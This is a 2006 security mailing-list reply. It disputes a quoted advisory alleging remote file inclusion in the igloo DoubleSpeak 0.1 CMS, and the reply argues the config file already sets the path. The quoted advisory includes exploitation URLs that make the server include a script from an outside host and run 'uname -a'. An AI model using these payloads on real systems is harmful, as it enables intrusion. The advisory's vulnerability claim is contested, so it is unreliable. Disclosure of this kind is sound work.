[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <814b9d50606121056w60623764wb1811d647349cc4e@mail.gmail.com>
Date: Mon, 12 Jun 2006 12:56:22 -0500
From: str0ke <str0ke@...w0rm.com>
To: "aminrayden@...oo.com" <aminrayden@...oo.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: igloo DoubleSpeak v 0.1 Multiple remote file inclusion
R@...N,
require "config.inc"; contains 'private' =>
'/www/mrpenguin.org/devel/private',
So this shouldn't be vulnerable. Missing something?
/str0ke
On 11 Jun 2006 20:47:48 -0000, aminrayden@...oo.com
<aminrayden@...oo.com> wrote:
> igloo DoubleSpeak v 0.1 Multiple remote file inclusion
>
> -----------------------------------------------------
>
> Aria-security.com advisory
>
> Bug Discovered by R@...N (amin emami)
>
> Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt
>
> email:AminRayden@...oo.com
>
> Date:12/06/2006
>
> -----------------------------------------------------
>
> Affected software description:
>
> IGLOO DoubleSpeak <= 0.1
>
> Vendor:http://sourceforge.net/projects/iglooweb/
>
> Vulnerability:Multiple remote file inclusion
>
> -----------------------------------------------------
>
> Summary:
>
> DoubleSpeak, formerly known as the Igloo Weblog,
>
> aims to be the easiest to use and most customizable CMS (content management system) on the Internet.
>
> -----------------------------------------------------
>
> Vulnerable code:
>
> require "config.inc";
>
>
>
> require "$config[private]/local.inc";
>
> -----------------------------------------------------
>
> Proof of concept:
>
> The problem exists is in the below files when used the variable $config[private] in a require() function without being Declared
>
> index.php
>
> faq.php
>
> hardware.php
>
> ianal.php
>
> links.php
>
> login.php
>
> logout.php
>
> new_stories.php
>
> old.php
>
> poll.php
>
> rtfm.php
>
> software.php
>
> TODO.php
>
> /admin/add_links.php
>
> /admin/add_story.php
>
> /admin/add_poll.php
>
> /admin/index.php
>
> /admin/view_story_queue.php
>
> /ui/create_acct.php
>
> /ui/submit_story.php
>
> /ui/suggest_poll.php
>
> /ui/suggest_topic.php
>
> /ui/vote_on_polls.php
>
> -----------------------------------------------------
>
> Exploitation example:
>
> http://www.r0x3d.com/[igloo_Path]/html/index.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> http://www.r0x3d.com/[igloo_Path]/html/faq.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> http://www.r0x3d.com/[igloo_Path]/html/hardware.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> ...
>
>
> -----------------------------------------------------
>
> Fix:
>
> turn off register_globals and add this code before vulnerable code
>
> $config[private] = "./";
>
>
> ===========================
>
> Aria Security Research
>
> Http://www.aria-security.net
>
>
>
>
Powered by blists - more mailing lists